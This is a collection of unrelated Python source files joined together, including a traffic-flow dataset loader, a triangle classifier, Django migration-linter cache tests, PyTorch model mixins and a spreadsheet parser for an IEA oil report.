    anchor_pos = s.find('<a href=')
    open_quote = s.find('"', anchor_pos)
    close_quote = s.find('"', open_quote + 1)
    return s[open_quote + 1:close_quote], close_quote
print get_next_target('<a href= "www.hello.com" >') |
### copy from jianjin
import random
import os.path
import logging
import os
from copy import copy
import numpy as np
import h5py
import pandas as pd
from datetime import datetime
import time
logger = logging.getLogger(__name__)
def string2timestamp(strings, T=48):
    """Convert 'YYYYMMDDSS' slot strings into pandas Timestamps.

    T is the number of time slots per day; the trailing slot number SS in the
    input is one-based.
    """
    slot_hours = 24.0 / T          # length of one slot, in hours
    slots_per_hour = T // 24
    result = []
    for s in strings:
        year = int(s[:4])
        month = int(s[4:6])
        day = int(s[6:8])
        slot = int(s[8:]) - 1      # zero-based slot within the day
        hour = int(slot * slot_hours)
        minute = (slot % slots_per_hour) * int(60.0 * slot_hours)
        result.append(pd.Timestamp(datetime(year, month, day, hour=hour, minute=minute)))
    return result
class STMatrix(object):
    """Spatio-temporal matrix: a sequence of frames indexed by timestamp.

    `data` is a sequence of frames aligned one-to-one with `timestamps`
    ('YYYYMMDDSS' strings, SS being the 1-based slot in a T-slot day).
    """
    def __init__(self, data, timestamps, T=48, CheckComplete=True):
        super(STMatrix, self).__init__()
        assert len(data) == len(timestamps)
        self.data = data
        self.timestamps = timestamps
        self.T = T  # number of time slots per day
        self.pd_timestamps = string2timestamp(timestamps, T=self.T)
        if CheckComplete:
            self.check_complete()
        # index
        self.make_index()
    def make_index(self):
        # Build get_index: pandas Timestamp -> integer row position in `data`.
        self.get_index = dict()
        for i, ts in enumerate(self.pd_timestamps):
            self.get_index[ts] = i
    def check_complete(self):
        # Assert consecutive timestamps are exactly one slot apart; print any
        # gaps before failing so the offending ranges are visible.
        missing_timestamps = []
        offset = pd.DateOffset(minutes=24 * 60 // self.T)
        pd_timestamps = self.pd_timestamps
        i = 1
        while i < len(pd_timestamps):
            if pd_timestamps[i-1] + offset != pd_timestamps[i]:
                missing_timestamps.append("(%s -- %s)" % (pd_timestamps[i-1], pd_timestamps[i]))
            i += 1
        for v in missing_timestamps:
            print(v)
        assert len(missing_timestamps) == 0
    def get_matrix(self, timestamp):
        """Return the frame stored for `timestamp` (a pandas Timestamp)."""
        return self.data[self.get_index[timestamp]]
    def save(self, fname):
        # Not implemented; kept for interface compatibility.
        pass
    def check_it(self, depends):
        """True iff every timestamp in `depends` exists in this matrix."""
        for d in depends:
            if d not in self.get_index.keys():
                return False
        return True
    def create_dataset(self, len_closeness=20):
        """current version

        Build closeness samples: for each timestamp whose previous
        `len_closeness` frames are all present, stack those frames
        (transposed to channel-last) into one example.  Returns
        (XC, timestamps_Y); XC is (samples, len_closeness, H, W, C) assuming
        each frame is (C, H, W) — confirm against the data source.
        """
        # offset_week = pd.DateOffset(days=7)
        offset_frame = pd.DateOffset(minutes=24 * 60 // self.T)
        XC = []
        timestamps_Y = []
        depends = [range(1, len_closeness+1)]
        i = len_closeness
        while i < len(self.pd_timestamps):
            Flag = True
            for depend in depends:
                if Flag is False:
                    break
                Flag = self.check_it([self.pd_timestamps[i] - j * offset_frame for j in depend])
            if Flag is False:
                # Some required history frame is missing: skip this target slot.
                i += 1
                continue
            x_c = [np.transpose(self.get_matrix(self.pd_timestamps[i] - j * offset_frame), [1, 2, 0]) for j in depends[0]]
            if len_closeness > 0:
                XC.append(np.stack(x_c, axis=0))
            timestamps_Y.append(self.timestamps[i])
            i += 1
        XC = np.stack(XC, axis=0)
        return XC, timestamps_Y
def load_stdata(fname):
    """Load the (data, date) arrays from one flow h5 file.

    Returns (data, timestamps) as in-memory NumPy arrays.
    """
    # `Dataset.value` was deprecated and removed in h5py >= 3.0; indexing with
    # [()] reads the full array.  The context manager also guarantees the file
    # handle is closed even if a read raises.
    with h5py.File(fname, 'r') as f:
        data = f['data'][()]
        timestamps = f['date'][()]
    return data, timestamps
def stat(fname):
    """Print summary statistics (shape, date span, missing ratio, min/max)
    for one flow h5 file."""
    def get_nb_timeslot(f):
        # Number of 30-minute slots spanned by [first date, last date]
        # inclusive (hence the trailing +48), plus both ISO date strings.
        s = f['date'][0]
        e = f['date'][-1]
        year, month, day = map(int, [s[:4], s[4:6], s[6:8]])
        ts = time.strptime("%04i-%02i-%02i" % (year, month, day), "%Y-%m-%d")
        year, month, day = map(int, [e[:4], e[4:6], e[6:8]])
        te = time.strptime("%04i-%02i-%02i" % (year, month, day), "%Y-%m-%d")
        nb_timeslot = (time.mktime(te) - time.mktime(ts)) / (0.5 * 3600) + 48
        ts_str, te_str = time.strftime("%Y-%m-%d", ts), time.strftime("%Y-%m-%d", te)
        return nb_timeslot, ts_str, te_str
    with h5py.File(fname, 'r') as f:
        nb_timeslot, ts_str, te_str = get_nb_timeslot(f)
        nb_day = int(nb_timeslot / 48)
        # `Dataset.value` was removed in h5py >= 3.0; read the array once with
        # [()] instead of materializing it twice via the deprecated attribute.
        data = f['data'][()]
        mmax = data.max()
        mmin = data.min()
        stat = '=' * 5 + 'stat' + '=' * 5 + '\n' + \
               'data shape: %s\n' % str(f['data'].shape) + \
               '# of days: %i, from %s to %s\n' % (nb_day, ts_str, te_str) + \
               '# of timeslots: %i\n' % int(nb_timeslot) + \
               '# of timeslots (available): %i\n' % f['date'].shape[0] + \
               'missing ratio of timeslots: %.1f%%\n' % ((1. - float(f['date'].shape[0] / nb_timeslot)) * 100) + \
               'max: %.3f, min: %.3f\n' % (mmax, mmin) + \
               '=' * 5 + 'stat' + '=' * 5
        print(stat)
class MinMaxNormalization(object):
    '''MinMax Normalization --> [0, 1]
       x = (x - min) / (max - min).

       NOTE(review): the original docstring advertised [-1, 1] and
       inverse_transform still assumed that range (the `x*2-1` step in
       transform had been commented out), so inverse_transform(transform(X))
       did not reproduce X.  inverse_transform now exactly inverts transform.
    '''
    def __init__(self):
        pass
    def fit(self, X):
        """Record the min/max of X for later (inverse) transforms."""
        self._min = X.min()
        self._max = X.max()
        print("min:", self._min, "max:", self._max)
    def transform(self, X):
        """Scale X into [0, 1] using the fitted min/max."""
        X = 1. * (X - self._min) / (self._max - self._min)
        return X
    def fit_transform(self, X):
        """Fit on X, then return the transformed X."""
        self.fit(X)
        return self.transform(X)
    def inverse_transform(self, X):
        """Map values from [0, 1] back to the original scale (true inverse
        of transform; previously assumed the abandoned [-1, 1] range)."""
        X = 1. * X * (self._max - self._min) + self._min
        return X
def timestamp2vec(timestamps):
    """Encode 'YYYYMMDD...' strings as 8-element day vectors.

    Positions 0-6 one-hot encode the weekday (Monday = 0, per tm_wday);
    position 7 is 1 on weekdays and 0 on weekends.
    """
    encoded = []
    for ts in timestamps:
        weekday = time.strptime(ts[:8], '%Y%m%d').tm_wday
        one_hot = [1 if d == weekday else 0 for d in range(7)]
        one_hot.append(0 if weekday >= 5 else 1)  # weekday flag
        encoded.append(one_hot)
    return np.asarray(encoded)
def remove_incomplete_days(data, timestamps, T=48):
    """Drop every day that does not contain all T consecutive slots.

    Timestamps look like 'YYYYMMDDSS' with SS the 1-based slot number; data
    rows correspond to timestamps one-to-one.  Returns the filtered
    (data, timestamps) pair.
    """
    complete_days = []
    incomplete_days = []
    i = 0
    n = len(timestamps)
    while i < n:
        if int(timestamps[i][8:]) != 1:
            # Not the first slot of a day: advance until a day boundary.
            i += 1
        elif i + T - 1 < n and int(timestamps[i + T - 1][8:]) == T:
            # Slots 1..T are all present: keep the whole day.
            complete_days.append(timestamps[i][:8])
            i += T
        else:
            incomplete_days.append(timestamps[i][:8])
            i += 1
    print("incomplete days: ", incomplete_days)
    keep = set(complete_days)
    idx = [j for j, ts in enumerate(timestamps) if ts[:8] in keep]
    data = data[idx]
    timestamps = [timestamps[j] for j in idx]
    return data, timestamps
class InputHandle:
    """Minibatch cursor over rows of a 4-D data array selected by `indices`."""
    def __init__(self, datas, indices, input_param):
        # Configuration comes from input_param; datas/indices are shared refs.
        self.name = input_param['name']
        self.input_data_type = input_param.get('input_data_type', 'float32')
        self.minibatch_size = input_param['minibatch_size']
        self.image_width = input_param['image_width']
        self.datas = datas
        self.indices = indices
        self.current_position = 0
        self.current_batch_indices = []
        self.current_input_length = input_param['seq_length']
    def total(self):
        """Number of samples available to this handle."""
        return len(self.indices)
    def begin(self, do_shuffle=True):
        """Reset the cursor to the first batch, optionally shuffling indices."""
        logger.info("Initialization for read data ")
        if do_shuffle:
            random.shuffle(self.indices)
        self.current_position = 0
        end = self.current_position + self.minibatch_size
        self.current_batch_indices = self.indices[self.current_position:end]
    def next(self):
        """Advance to the next batch; returns None once exhausted."""
        self.current_position += self.minibatch_size
        if self.no_batch_left():
            return None
        end = self.current_position + self.minibatch_size
        self.current_batch_indices = self.indices[self.current_position:end]
    def no_batch_left(self):
        """True when fewer than one full minibatch remains."""
        return self.current_position + self.minibatch_size >= self.total()
    def get_batch(self):
        """Return the current minibatch cast to the configured dtype, or None."""
        if self.no_batch_left():
            logger.error(
                "There is no batch left in " + self.name + ". Consider to user iterators.begin() to rescan from the beginning of the iterators")
            return None
        batch = self.datas[self.current_batch_indices, :, :, :]
        return batch.astype(self.input_data_type)
    def print_stat(self):
        """Log a summary of the iterator's configuration and position."""
        logger.info("Iterator Name: " + self.name)
        logger.info("    current_position: " + str(self.current_position))
        logger.info("    Minibatch Size: " + str(self.minibatch_size))
        logger.info("    total Size: " + str(self.total()))
        logger.info("    current_input_length: " + str(self.current_input_length))
        logger.info("    Input Data Type: " + str(self.input_data_type))
class DataProcess:
    """Loads the BJ*_M32x32_T30_InOut.h5 flow files and exposes train/test
    InputHandle iterators over closeness sequences."""
    def __init__(self, input_param):
        # input_param must provide 'paths', 'image_width', 'seq_length' plus
        # the keys InputHandle reads ('name', 'minibatch_size', ...).
        self.paths = input_param['paths']
        self.image_width = input_param['image_width']
        self.input_param = input_param
        self.seq_len = input_param['seq_length']
        self.train_data, self.test_data, _, _, _ = self.load_data(self.paths, len_closeness=input_param['seq_length'])
        self.train_indices = list(range(self.train_data.shape[0]))
        self.test_indices = list(range(self.test_data.shape[0]))
    def load_data(self, datapath, T=48, nb_flow=2, len_closeness=None, len_test=48 * 7 * 4):
        """Load BJ13-BJ16 files from datapath[0], min-max scale on the
        training range, and build closeness sequences.

        Returns (X_train, X_test, mmn, timestamp_train, timestamp_test);
        the last `len_test` samples form the test split.
        """
        assert (len_closeness > 0)
        # load data
        # 13 - 16
        data_all = []
        timestamps_all = list()
        for year in range(13, 17):
            fname = os.path.join(
                datapath[0], 'BJ{}_M32x32_T30_InOut.h5'.format(year))
            print("file name: ", fname)
            stat(fname)
            data, timestamps = load_stdata(fname)
            # print(timestamps)
            # remove a certain day which does not have 48 timestamps
            data, timestamps = remove_incomplete_days(data, timestamps, T)
            data = data[:, :nb_flow]
            data[data < 0] = 0.  # clamp negative flows to zero
            data_all.append(data)
            timestamps_all.append(timestamps)
            print("\n")
        # minmax_scale
        # Fit the scaler only on the training range (everything before the
        # test tail) to avoid leaking test statistics.
        data_train = np.vstack(copy(data_all))[:-len_test]
        print('train_data shape: ', data_train.shape)
        mmn = MinMaxNormalization()
        mmn.fit(data_train)
        data_all_mmn = [mmn.transform(d) for d in data_all]
        XC = []
        timestamps_Y = []
        for data, timestamps in zip(data_all_mmn, timestamps_all):
            # instance-based dataset --> sequences with format as (X, Y) where X is
            # a sequence of images and Y is an image.
            st = STMatrix(data, timestamps, T, CheckComplete=False)
            _XC, _timestamps_Y = st.create_dataset(len_closeness=len_closeness)
            XC.append(_XC)
            timestamps_Y += _timestamps_Y
        XC = np.concatenate(XC, axis=0)
        print("XC shape: ", XC.shape)
        XC_train = XC[:-len_test]
        XC_test = XC[-len_test:]
        timestamp_train, timestamp_test = timestamps_Y[:-len_test], timestamps_Y[-len_test:]
        X_train = XC_train
        X_test = XC_test
        print('train shape:', XC_train.shape,
              'test shape: ', XC_test.shape)
        return X_train, X_test, mmn, timestamp_train, timestamp_test
    def get_train_input_handle(self):
        """InputHandle over the training split."""
        return InputHandle(self.train_data, self.train_indices, self.input_param)
    def get_test_input_handle(self):
        """InputHandle over the test split."""
        return InputHandle(self.test_data, self.test_indices, self.input_param)
|
# Read three candidate side lengths and classify the triangle they form.
# (Test your code incrementally and with inputs beyond the sample case.)
a = float(input("Lado 1: "))
b = float(input("Lado 2: "))
c = float(input("Lado 3: "))
print("Entradas:", a, ",", b, ",", c)

# Triangle inequality first; then classify by how many sides coincide.
if a >= b + c or b >= a + c or c >= a + b:
    print("Tipo de triangulo: invalido")
elif a == b == c:
    print("Tipo de triangulo: equilatero")
elif a == b or a == c or b == c:
    print("Tipo de triangulo: isosceles")
else:
    print("Tipo de triangulo: escaleno")
|
# Copyright 2019 3YOURMIND GmbH
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
import unittest
import sys
from tests import fixtures
from django_migration_linter import MigrationLinter, Cache, DEFAULT_CACHE_PATH
if sys.version_info >= (3, 3):
import unittest.mock as mock
else:
import mock
class CacheTest(unittest.TestCase):
    """Tests for the migration linter's SQL-result cache: results are keyed
    by a hash of each migration file, reused on a second run, and invalidated
    when the file's content changes."""
    # Migration file mutated (and restored) by test_cache_modified.
    MIGRATION_FILE = os.path.join(fixtures.ALTER_COLUMN_PROJECT, 'test_app', 'migrations', '0001_initial.py')
    def test_cache_normal(self):
        # First run computes SQL for both migrations and caches OK/ERR.
        cache_file = os.path.join(DEFAULT_CACHE_PATH, 'test_project_add_not_null_column.pickle')
        if os.path.exists(cache_file):
            os.remove(cache_file)
        linter = MigrationLinter(fixtures.ADD_NOT_NULL_COLUMN_PROJECT)
        with mock.patch.object(MigrationLinter, 'get_sql', wraps=linter.get_sql)as sql_mock:
            linter.lint_all_migrations()
            self.assertEqual(sql_mock.call_count, 2)
        cache = Cache(
            fixtures.ADD_NOT_NULL_COLUMN_PROJECT,
            DEFAULT_CACHE_PATH
        )
        cache.load()
        # Cache keys are content hashes of the migration files — presumably
        # md5; verify against the Cache implementation.
        self.assertEqual(cache['3ef74e7f3e53e273e2fc95379248d58d']['result'], 'OK')
        self.assertEqual(cache['e1e312b6d08ecbe017c25c58fc2be257']['result'], 'ERR')
        self.assertListEqual(
            cache['e1e312b6d08ecbe017c25c58fc2be257']['errors'],
            [{'err_msg': 'RENAMING tables', 'code': 'RENAME_TABLE', 'table': None, 'column': None}]
        )
        # Start the Linter again -> should use cache now.
        linter = MigrationLinter(fixtures.ADD_NOT_NULL_COLUMN_PROJECT)
        with mock.patch.object(MigrationLinter, 'get_sql', wraps=linter.get_sql) as sql_mock:
            linter.lint_all_migrations()
            self.assertEqual(sql_mock.call_count, 0)
            self.assertTrue(linter.has_errors)
    def test_cache_ignored(self):
        # Migrations marked ignored are cached with result 'IGNORE' and also
        # skip SQL generation on the second run.
        cache_file = os.path.join(DEFAULT_CACHE_PATH, 'test_project_ignore_migration.pickle')
        if os.path.exists(cache_file):
            os.remove(cache_file)
        linter = MigrationLinter(fixtures.IGNORE_MIGRATION_PROJECT)
        with mock.patch.object(MigrationLinter, 'get_sql', wraps=linter.get_sql) as sql_mock:
            linter.lint_all_migrations()
            self.assertEqual(sql_mock.call_count, 2)
        cache = Cache(
            fixtures.IGNORE_MIGRATION_PROJECT,
            DEFAULT_CACHE_PATH
        )
        cache.load()
        self.assertEqual(cache['63230606af0eccaef7f1f78c537c624c']['result'], 'OK')
        self.assertEqual(cache['5c5ca1780a9f28439c1defc1f32af894']['result'], 'IGNORE')
        # Start the Linter again -> should use cache now.
        linter = MigrationLinter(fixtures.IGNORE_MIGRATION_PROJECT)
        with mock.patch.object(MigrationLinter, 'get_sql', wraps=linter.get_sql) as sql_mock:
            linter.lint_all_migrations()
            self.assertEqual(sql_mock.call_count, 0)
    def test_cache_ignored_command_line(self):
        # Migrations excluded via ignore_name_contains never reach get_sql
        # and are not cached at all.
        cache_file = os.path.join(DEFAULT_CACHE_PATH, 'test_project_ignore_migration.pickle')
        if os.path.exists(cache_file):
            os.remove(cache_file)
        linter = MigrationLinter(fixtures.IGNORE_MIGRATION_PROJECT,
                                 ignore_name_contains='0001')
        with mock.patch.object(MigrationLinter, 'get_sql', wraps=linter.get_sql) as sql_mock:
            linter.lint_all_migrations()
            self.assertEqual(sql_mock.call_count, 1)
        cache = Cache(
            fixtures.IGNORE_MIGRATION_PROJECT,
            DEFAULT_CACHE_PATH
        )
        cache.load()
        self.assertNotIn('63230606af0eccaef7f1f78c537c624c', cache)
        self.assertEqual(cache['5c5ca1780a9f28439c1defc1f32af894']['result'], 'IGNORE')
    def test_cache_modified(self):
        # Appending to a migration file changes its hash, so the old cache
        # entry disappears and a new one is created.
        cache_file = os.path.join(DEFAULT_CACHE_PATH, 'test_project_alter_column.pickle')
        if os.path.exists(cache_file):
            os.remove(cache_file)
        linter = MigrationLinter(fixtures.ALTER_COLUMN_PROJECT)
        linter.lint_all_migrations()
        cache = Cache(
            fixtures.ALTER_COLUMN_PROJECT,
            DEFAULT_CACHE_PATH
        )
        cache.load()
        self.assertEqual(cache['8589aa107b6da296c4b49cd2681d2230']['result'], 'OK',
                         'If this fails, tearDown might have failed to remove '
                         'the modification from tests/test_project_fixtures/'
                         'test_project_alter_column/test_app/migrations/0001_initial.py'
                         )
        self.assertEqual(cache['8f54c4a434cfaa9838e8ca12eb988255']['result'], 'ERR')
        self.assertListEqual(
            cache['8f54c4a434cfaa9838e8ca12eb988255']['errors'],
            [{u'err_msg': u'ALTERING columns (Could be backward compatible. '
                          u'You may ignore this migration.)',
              u'code': u'ALTER_COLUMN',
              u'table': u'test_app_a',
              u'column': None}
             ]
        )
        # Modify migration
        backup_migration_file = self.MIGRATION_FILE + "_backup"
        shutil.copy2(self.MIGRATION_FILE, backup_migration_file)
        with open(self.MIGRATION_FILE, "a") as f:
            f.write("# modification at the end of the file")
        # Start the Linter again -> Cache should look different now
        linter = MigrationLinter(fixtures.ALTER_COLUMN_PROJECT)
        linter.lint_all_migrations()
        cache = Cache(
            fixtures.ALTER_COLUMN_PROJECT,
            DEFAULT_CACHE_PATH
        )
        cache.load()
        # Restore the pristine migration before asserting, so a failure here
        # does not leave the fixture modified for other tests.
        shutil.copy2(backup_migration_file, self.MIGRATION_FILE)
        os.remove(backup_migration_file)
        self.assertNotIn('8589aa107b6da296c4b49cd2681d2230', cache)
        self.assertEqual(cache['fbee628b1ab4bd1c14f8a4b41123e7cf']['result'], 'OK')
|
from collections import OrderedDict
from copy import deepcopy
import numpy as np
import torch
from torch import nn
from utils.io import make_path
class MLFeatures:
    """Attribute declarations shared by the model/optimizer mixins below.

    Subclasses (ModelCallbacks, ParamGroupCallbacks) populate these fields in
    their ``init_*`` methods; this base only declares them and exposes a
    read-only accessor for the model dict.
    """
    # Mapping: model name -> whether a frozen "target" copy is required.
    __RequiredTarget__: OrderedDict
    # Suffix appended to a model name when registering its target copy.
    __IgnoreSuffix__: str = '__'
    # name -> nn.Module, including any '<name>__' target copies.
    _model_callbacks: nn.ModuleDict
    # name -> kwargs dict used to (re)instantiate that model.
    _model_kwargs: OrderedDict
    # name -> model class (constructor callable).
    _model_type_callbacks: OrderedDict
    _optim_callbacks: OrderedDict
    _param_groups: OrderedDict
    @property
    def model_callbacks(self):
        """Read-only access to the registered models."""
        return self._model_callbacks
class ModelCallbacks(MLFeatures):
    """Mixin that builds and manages the nn.Module instances named in
    ``__RequiredTarget__``."""
    def init_model_callbacks(self, model_kwargs, **kwargs):
        """Register model constructors.

        model_kwargs maps model name -> (module class, init-kwargs dict).

        Raises:
            RuntimeError: if any name required by ``__RequiredTarget__`` is
                missing from model_kwargs.
        """
        # Model Initialization
        model_names = model_kwargs.keys()
        model_types, init_kwargs = zip(*model_kwargs.values())
        missing_callbacks = set(self.__RequiredTarget__.keys()) - set(model_names)
        if len(missing_callbacks) > 0:
            # BUG FIX: the exception was constructed but never raised, so a
            # missing required model previously went completely unnoticed.
            raise RuntimeError('Model initialization failed, missing model_callbacks {}'.format(missing_callbacks))
        self._model_callbacks = nn.ModuleDict()
        self._model_kwargs = OrderedDict(zip(model_names, init_kwargs))
        self._model_type_callbacks = OrderedDict(zip(model_names, model_types))
    def _init_models(self, update_keys=None):
        """(Re)instantiate the models for `update_keys` (default: all).

        Models flagged in ``__RequiredTarget__`` also get a frozen deep copy
        registered under '<name>__' as a target network.
        """
        if update_keys is None:
            update_keys = self._model_callbacks.keys()
        update_list = []
        for name in update_keys:
            model_arch = self._model_type_callbacks[name]
            init_kwargs = self._model_kwargs.get(name)
            if init_kwargs is None:
                init_kwargs = {}
            model = model_arch(**init_kwargs)
            update_list.append((name, model))
            if self.__RequiredTarget__[name]:
                target_model = deepcopy(model)
                for p in target_model.parameters():
                    p.requires_grad = False  # target nets are never trained directly
                update_list.append((name + self.__IgnoreSuffix__, target_model))
        self._model_callbacks.update(update_list)
        del update_list
    def train(self, mode=True):
        """Put every registered model into train (or eval) mode."""
        self._model_callbacks.train(mode)
    def eval(self):
        """Put every registered model into eval mode."""
        self.train(mode=False)
    def load_models(self, path, **kwargs):
        """Load each model's state dict from '<path>/<name>.pt'."""
        for key, model in self._model_callbacks.items():
            model.load_state_dict(torch.load('{}/{}.pt'.format(path, key)))
        print('Models loaded successfully')
    def save_models(self, path, **kwargs):
        """Save each model's state dict to '<path>/<name>.pt'."""
        make_path(path)
        for key, model in self._model_callbacks.items():
            torch.save(model.state_dict(), '{}/{}.pt'.format(path, key))
        print('Models saved successfully')
class ParamGroupCallbacks(MLFeatures):
    """Mixin that assembles optimizer parameter groups from the registered
    models."""
    def init_param_groups(self, unique_optim_kwargs=None):
        """Build ``_param_groups``: one entry per non-target model, carrying
        that model's parameters plus any per-group optimizer kwargs passed in
        `unique_optim_kwargs`."""
        self._param_groups = OrderedDict(unique_optim_kwargs) if unique_optim_kwargs else OrderedDict()
        for name, module in self._model_callbacks.items():
            # Frozen target copies (suffixed with '__') are never optimized.
            if name.endswith(self.__IgnoreSuffix__):
                continue
            group = self._param_groups.setdefault(name, {})  # Ensure every required key has a dict
            group.update(params=module.parameters())
class Memory:
    """Rolling buffers holding per-building observation/reward histories.

    TODO Make it into Mixin
    """
    @classmethod
    def init_memory(cls, observation_spaces, memory_size, **kwargs):
        """Allocate zeroed class-level buffers.

        # Scene Memory for Agent - (Building, Time, Std_Observation)
        # Reward Memory for Agent - (Building, Time)
        Each row of `observation_spaces` is repeated `memory_size` times
        along a new time axis.
        """
        state_example = observation_spaces[:, None].repeat(memory_size, 1)
        lead_dim = state_example.shape[:-1]
        cls.state_memory = np.zeros_like(state_example, dtype=np.float32)  # Save as double-precision for preprocess
        cls.reward_memory = np.zeros(lead_dim, dtype=np.float32)  # TODO Reward Dim?
        # BUG FIX: np.bool was removed in NumPy 1.24; the builtin `bool`
        # yields the same np.bool_ dtype.
        cls.valid_mask = np.zeros(lead_dim, dtype=bool)
    def update_state_memory(self, state):
        """Append `state` along the time axis and mark the new slots valid."""
        # separate adding state memory from _encoder_state (which is called by select_action)
        axis = 1
        state, time_length = self._check_time_dim(state, self.state_memory, axis=axis)
        self.update_memory(state, self.state_memory, axis=axis, copy=False)
        self.update_memory(np.ones(time_length, dtype=bool), self.valid_mask, axis=axis, copy=False)
    @staticmethod
    def update_memory(data: np.ndarray, memory: np.ndarray, axis=0, copy=True):
        """Shift `memory` left along `axis` by the time length of `data` and
        write `data` into the freed tail slots.

        Returns the updated array — a copy when copy=True, otherwise `memory`
        mutated in place.
        """
        if copy:
            memory = np.copy(memory)
        data, time_length = Memory._check_time_dim(data, memory, axis=axis)
        # Views into `memory`: everything but the last `time_length` slots,
        # and the tail.  NumPy handles the overlapping slice assignment.
        old_memory, new_memory = np.split(memory, [-time_length], axis=axis)
        old_memory[:] = np.split(memory, [time_length], axis=axis)[1]
        new_memory[:] = data
        return memory
    @staticmethod
    def _check_time_dim(data, memory, axis=0):
        """Give `data` the same rank as `memory` (inserting a length-1 time
        axis when needed); return (data, time_length_along_axis)."""
        data = np.asarray(data)
        if data.ndim == memory.ndim-1:
            data = np.copy(data)
            data = np.expand_dims(data, axis)
        assert data.ndim == memory.ndim
        return data, data.shape[axis]
|
"""
Django settings sans boilerplate
"""
from .functions import emplace, setenv
__all__ = ['emplace', 'setenv']
|
import mysql.connector
from mysql.connector import Error
from openpyxl import load_workbook
from openpyxl.styles import Alignment, Protection, Font
#To load workbook
wb = load_workbook('./AugustReport/July2019IEAReport.xlsx')
# `Workbook.get_sheet_names()` was deprecated and removed in openpyxl 3.x;
# the `sheetnames` property returns the same list of titles.
print(wb.sheetnames)
anotherSheet = wb.active
# The blocks below (sheet backup/rotation for Annual/Quarter) are kept as
# deliberately disabled toggles.
# try:
#     sheet = wb.get_sheet_by_name('Annual_Previous')
#     wb.remove_sheet(sheet)
#     sheet = wb.get_sheet_by_name('Annual')
#     ws2 = wb.copy_worksheet(sheet)
#     ws2.title = 'Annual_Previous'
# except Exception as e:
#     sheet = wb.get_sheet_by_name('Annual')
#     ws2 = wb.copy_worksheet(sheet)
#     ws2.title = 'Annual_Previous'
# try:
#     sheet = wb.get_sheet_by_name('Quarter_Previous')
#     wb.remove_sheet(sheet)
#     sheet = wb.get_sheet_by_name('Quarter')
#     ws2 = wb.copy_worksheet(sheet)
#     ws2.title = 'Quarter_Previous'
# except Exception as e:
#     sheet = wb.get_sheet_by_name('Quarter')
#     ws2 = wb.copy_worksheet(sheet)
#     ws2.title = "Quarter_Previous"
#     pass
# NOTE(review): this writes an unmodified copy to the working directory
# before any data is filled in — presumably a snapshot; confirm intent.
wb.save('./July2019IEAReport.xlsx')
#to find row number of OECD,NONOOECD,TOTALOECD,TOTALNONOECD
def fetch_excel(sheet):
    """Scan column A of the named worksheet and record the row numbers of
    the Demand/Supply/Stocks section markers.

    Returns (fetch, match_fetch): two dicts mapping marker names (e.g.
    'oecd_demand', 'DemandTotal OECD') to 1-based row indices.

    NOTE(review): this relies on for-loop variables (`total`, `non`,
    `tot_n_opec`, `opec`, ...) leaking past their loops so each scan resumes
    where the previous one stopped; the sheet layout must match exactly, or
    some of these names stay unbound — verify against the workbook format.
    """
    print(sheet)
    flag = 0
    mbd = -1  # row of the 'CHANGE - MBD' marker; -1 until found
    fetch = {}
    match_fetch={}
    sheet = wb.get_sheet_by_name(sheet)
    max_col = (sheet.max_column)
    print(max_col)
    max_row = (sheet.max_row)
    print(max_row)
    for row in range(1,max_row):
        row_ex = 'A'+str(row)
        if sheet[row_ex].value == 'Demand':
            fetch['Demand'] = row
            match_fetch['Demand'] = row
            row = row + 1
            row_ex = 'A' + str(row)
            if sheet[row_ex].value == 'OECD':
                match_fetch['DemandOECD'] = row
                row = row + 1
                oecd_demand = row
                fetch['oecd_demand'] = oecd_demand
                # Each loop below continues from where the previous one broke.
                for total in range(row,max_row):
                    row_ex = 'A' + str(total)
                    if sheet[row_ex].value == 'Total OECD':
                        totaloecd_demand = total
                        total = total+1
                        print('totaloecd_demand',totaloecd_demand)
                        fetch['totaloecd_demand'] = totaloecd_demand
                        match_fetch['DemandTotal OECD'] = totaloecd_demand
                        break
                for non in range(total,max_row):
                    row_ex = 'A' + str(non)
                    if sheet[row_ex].value == 'Non-OECD':
                        match_fetch['DemandNon-OECD'] = non
                        non = non + 1
                        nonoecd_demand = non
                        fetch['nonoecd_demand'] = nonoecd_demand
                        break
                for total_non in range(non,max_row):
                    row_ex = 'A' + str(total_non)
                    if sheet[row_ex].value == 'Total Non-OECD':
                        totalnonoecd_demand = total_non
                        total_non = total_non + 1
                        fetch['totalnonoecd_demand'] = totalnonoecd_demand
                        match_fetch['DemandTotal Non-OECD'] = totalnonoecd_demand
                        break
        elif sheet[row_ex].value == 'Supply':
            fetch['Supply'] = row
            match_fetch['Supply'] = row
            row = row + 1
            row_ex = 'A' + str(row)
            if sheet[row_ex].value == 'OECD':
                row = row + 1
                oecd_supply = row
                fetch['oecd_supply'] = oecd_supply
                for total in range(row,max_row):
                    row_ex = 'A' + str(total)
                    if sheet[row_ex].value == 'Total OECD':
                        totaloecd_supply = total
                        total = total+1
                        fetch['totaloecd_supply'] = totaloecd_supply
                        match_fetch['SupplyTotal OECD'] = totaloecd_supply
                        break
                for non in range(total,max_row):
                    row_ex = 'A' + str(non)
                    if sheet[row_ex].value == 'Non-OECD':
                        match_fetch['SupplyNon-OECD'] = non
                        nonoecd_supply = non
                        non = non + 1
                        fetch['nonoecd_supply'] = nonoecd_supply
                        break
                for total_non in range(non,max_row):
                    row_ex = 'A' + str(total_non)
                    if sheet[row_ex].value == 'Total Non-OECD':
                        totalnonoecd_supply = total_non
                        total_non = total_non + 1
                        fetch['totalnonoecd_supply'] = totalnonoecd_supply
                        match_fetch['SupplyTotal Non-OECD'] = totalnonoecd_supply
                        break
                for tot_n_opec in range(non, max_row):
                    row_ex = 'A' + str(tot_n_opec)
                    if sheet[row_ex].value == 'Total Non-OPEC Supply':
                        total_non_opec_supply = tot_n_opec
                        tot_n_opec = tot_n_opec + 1
                        fetch['total_non_opec_supply'] = total_non_opec_supply
                        match_fetch['Total Non-OPEC Supply'] = total_non_opec_supply
                        break
                for opec in range(tot_n_opec, max_row):
                    row_ex = 'A' + str(opec)
                    if sheet[row_ex].value == 'OPEC':
                        match_fetch['OPEC'] = opec
                        opec_supply = opec
                        fetch['opec_supply'] = opec_supply
                        opec = opec + 1
                        break
                for tot_opec in range(opec, max_row):
                    row_ex = 'A' + str(tot_opec)
                    if sheet[row_ex].value == 'Total OPEC':
                        total_opec_supply = tot_opec
                        fetch['total_opec_supply'] = total_opec_supply
